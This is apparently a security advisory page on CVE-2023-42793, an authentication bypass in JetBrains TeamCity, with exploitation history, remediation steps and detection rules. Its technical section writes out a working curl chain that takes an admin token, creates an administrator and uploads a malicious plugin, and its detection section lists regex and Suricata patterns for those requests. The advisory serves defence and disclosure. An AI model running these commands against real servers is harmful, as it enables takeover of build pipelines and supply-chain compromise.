CVE-2023-42793 Critical Patch Available

CVE-2023-42793: JetBrains TeamCity — Pre-Auth Authentication Bypass

Vuln Brief Research Team · · CVSS 9.8

CVE Details

CVE ID CVE-2023-42793
CVSS Score 9.8
Severity Critical
Vendor JetBrains
Product TeamCity
Patch Status Available
Published March 17, 2026

Background

JetBrains TeamCity is a widely-deployed CI/CD (Continuous Integration/Continuous Deployment) server critical to software development pipelines at organisations ranging from independent software vendors to large enterprises and government contractors. TeamCity controls build, test, and deployment automation — a compromise gives attackers the ability to modify software artifacts, steal source code and credentials, and potentially insert malicious code into products distributed to customers.

CVE-2023-42793 is a critical pre-authentication bypass in TeamCity Server, disclosed in September 2023. The vulnerability allows any unauthenticated attacker with HTTP access to a TeamCity server to obtain administrator-level access tokens without any credentials. The vulnerability saw aggressive exploitation by multiple nation-state threat actors, most prominently Russia’s APT29 (SVR) and North Korean Lazarus/Diamond SLEET groups, with CISA, FBI, and international partners issuing multiple advisories.

Technical Mechanism

CVE-2023-42793 is an authentication bypass in TeamCity’s REST API. The vulnerability is in TeamCity’s Tomcat-based web server request routing and authentication filter chain.

TeamCity uses a URL-based authentication mechanism where certain endpoints are designated as requiring authentication. The bypass works by exploiting a discrepancy between the authentication check and the actual URL routing:

Specifically, TeamCity’s authentication filter checks request paths and applies authentication requirements based on URL prefix matching. The filter can be bypassed using a semicolon (;) in the URL path — a technique known as “path parameter injection”:

# Normally restricted endpoint (creates admin tokens):
POST /app/rest/users/id:1/tokens/

# Bypass using semicolon path parameter:
POST /app/rest/users/id:1/tokens/RPC2;.jsp
# The authentication filter sees this as ending in .jsp (whitelisted)
# But Tomcat routes it to /app/rest/users/id:1/tokens/RPC2

With an obtained administrator token, full control of TeamCity is achieved:

# Step 1: Obtain admin token via bypass
curl -X POST "https://teamcity.target.com/app/rest/users/id:1/tokens/RPC2;.jsp" \
  -H "Content-Type: application/json"

# Step 2: Use token to create a new administrator
curl -X POST "https://teamcity.target.com/app/rest/users" \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{"username":"attacker","password":"P@ss!","roles":{"role":[{"roleId":"SYSTEM_ADMIN","scope":"g"}]}}'

# Step 3: Install malicious plugin for RCE
curl -X POST "https://teamcity.target.com/admin/pluginUpload.html" \
  -H "Authorization: Bearer <token>" \
  -F "file=@malicious.zip"

Real-World Exploitation Evidence

CVE-2023-42793 was the subject of a major joint advisory from CISA, FBI, NSA, and international intelligence partners specifically addressing state-sponsored exploitation:

APT29 (Russian SVR / Cozy Bear):

  • Microsoft and CISA documented APT29 leveraging CVE-2023-42793 to compromise TeamCity servers, with particular interest in software development companies, IT service providers, and organisations with significant software production capabilities.
  • The methodology echoes the 2020 SolarWinds supply chain attack: APT29 seeks to compromise build infrastructure to potentially poison software distributed to downstream customers.
  • Post-exploitation included planting backdoors in build configurations, stealing source code, and harvesting credentials stored in TeamCity.

DIAMOND SLEET and ANYPONG (North Korean Lazarus Group affiliates):

  • Two distinct North Korean threat actor clusters were documented exploiting CVE-2023-42793. Their goals appeared to include credential harvesting, cryptocurrency theft infrastructure compromise, and espionage.
  • DTrack malware and other North Korean tooling were deployed post-exploitation.

Widespread opportunistic exploitation by criminal actors was also documented, with ransomware groups and initial access brokers also weaponising the vulnerability.

Impact Assessment

Supply chain implications of TeamCity compromise:

  • Build pipeline poisoning: Attackers can modify build configurations to include malicious steps that inject code into compiled software artifacts.
  • Artifact signing: If the build server has access to code signing certificates, compromised artifacts can be signed with legitimate certificates.
  • Source code theft: TeamCity has read access to all connected VCS (version control) repositories.
  • Credential harvesting: Build pipelines store credentials for cloud providers, package registries (NPM, PyPI, NuGet), deployment targets, and databases.
  • Downstream customer impact: Organisations using software built on a compromised TeamCity server may unknowingly receive malicious updates.

Affected Versions

ProductAffected VersionsFixed Version
TeamCity On-PremisesAll versions before 2023.05.42023.05.4
TeamCity CloudPatched automaticallyN/A

Remediation Steps

  1. Upgrade to TeamCity 2023.05.4 or later: This is the primary remediation.

  2. Apply security patch plugin (if immediate upgrade is not possible):

    • JetBrains released a standalone security patch plugin for this vulnerability
    • Install via TeamCity admin UI under Administration > Plugins

  3. Audit administrator accounts: Immediately after patching, review all accounts with SYSTEM_ADMIN role:

    # Via TeamCity REST API
curl "https://teamcity.example.com/app/rest/users?locator=role:SYSTEM_ADMIN" \
  -H "Authorization: Bearer <token>"

  4. Review installed plugins: Check for plugins installed by unauthorised users:

    • Administration > Plugins — review all installed plugins and their installation dates

  5. Review build configuration changes: Check VCS history and TeamCity audit logs for modifications to build configurations.

  6. Rotate all credentials: Change all credentials stored in TeamCity parameters, connection profiles, and environment variables.

Detection Guidance

Log sources:

  • TeamCity server log: <TeamCity data dir>/logs/teamcity-server.log
  • Access log: <TeamCity install>/logs/localhost_access_log.*.txt
  • TeamCity audit log: Administration > Audit Log

Suspicious access patterns:

POST /app/rest/users/.*/tokens/.*\.jsp
POST /app/rest/users/.*/tokens/.*\;
POST /admin/pluginUpload.html (unexpected)

Suricata signature:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"JetBrains TeamCity CVE-2023-42793 Auth Bypass"; flow:established,to_server; http.uri; content:"/app/rest/users/"; http.uri; content:"tokens/"; distance:0; pcre:"/tokens\/[^?]+[;\.]jsp/"; sid:9002342; rev:1;)

Timeline

DateEvent
September 18, 2023JetBrains releases TeamCity 2023.05.4 with fix; advisory published
September 18, 2023CISA adds CVE-2023-42793 to KEV catalogue
September 19, 2023Rapid7 and other firms publish PoC exploits
September 20, 2023Mass exploitation begins
October 2023CISA/FBI/NSA joint advisory on APT29 exploitation
December 2023Additional advisory on North Korean actor exploitation
2024Continued attribution and victim identification

Tags

jetbrainsteamcityauthentication-bypassci-cdapt29supply-chaincisa-kev

Related Analysis

CVE-2024-1708 Critical

CVE-2024-1708: ConnectWise ScreenConnect Path Traversal — RMM Tools as Attack Vectors

ConnectWise

CVE-2026-0300 Critical

CVE-2026-0300: Palo Alto PAN-OS Out-of-Bounds Write Leads to Root RCE on Firewalls

Palo Alto Networks

CVE-2026-20182 Critical

CVE-2026-20182: Cisco Catalyst SD-WAN Authentication Bypass — Unauthenticated Admin Access

Cisco